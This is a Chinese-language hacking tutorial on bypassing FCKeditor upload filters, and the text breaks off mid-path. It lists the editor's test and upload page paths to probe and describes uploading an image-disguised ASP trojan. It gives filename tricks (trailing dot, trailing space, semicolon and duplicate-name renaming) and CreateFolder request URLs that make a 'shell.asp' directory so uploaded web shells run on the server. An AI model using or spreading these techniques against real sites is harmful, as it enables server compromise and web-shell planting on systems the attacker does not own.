突破fck上传漏洞详解fckeditor存在很多漏洞的
我把一些常见的上传漏洞给大家列出来下
/FCKeditor/_samples/default.html
/fckeditor/_samples/default.html
/fckeditor/editor/filemanager/browser/default/connectors/test.html
/fckeditor/editor/filemanager/connectors/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html
/FCKeditor/editor/filemanager/upload/test.html
/fckeditor/editor/filemanager/browser/default/frmupload.html
/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&;Connector=connectors/asp/connector.aspx
/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&;Connector=connectors/asp/connector.aspx
/admin/editor/editor/filemanager/upload/test.html
/editor/editor/filemanager/upload/test.html
我们来测试下 这个上传页面被删除了 看下一个
呵呵 其实这些大部分都删除了
剩下这个/FCKeditor/editor/filemanager/connectors/uploadtest.html还在
测试下上传 这个是图片木马
/userfiles/ye4r_asp;1.jpg 看到没 它把ye4r.asp变成了ye4r_asp
那怎么办呢··
解决方法就是再上传一次/userfiles/ye4r.asp;1(1).jpg
1.查看编辑器版本
FCKeditor/_whatsnew.html
—————————————————————————————————————————————————————————————
2. Version 2.2 版本
Apache+
linux 环境下在上传文件后面加个.突破!测试通过。
—————————————————————————————————————————————————————————————
3.Version <=2.4.2 For php 在处理
PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
—————————————————————————————————————————————————————————————
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
4.1:提交shell.php+空格绕过
不过空格只支持win
系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
———————————————————
——————————————————————————————————————————
5. 突破建立文件夹
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&;Type=Image&;CurrentFolder=%2Fshell.asp&;NewFolderName=z&;uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&;CurrentFolder=/&;Type=Image&;NewFolderName=shell.asp
—————————————————————————————————————————————————————————————
6. FCKeditor 中test 文件的上传地址
FCKeditor/editor/filemanager/browser/def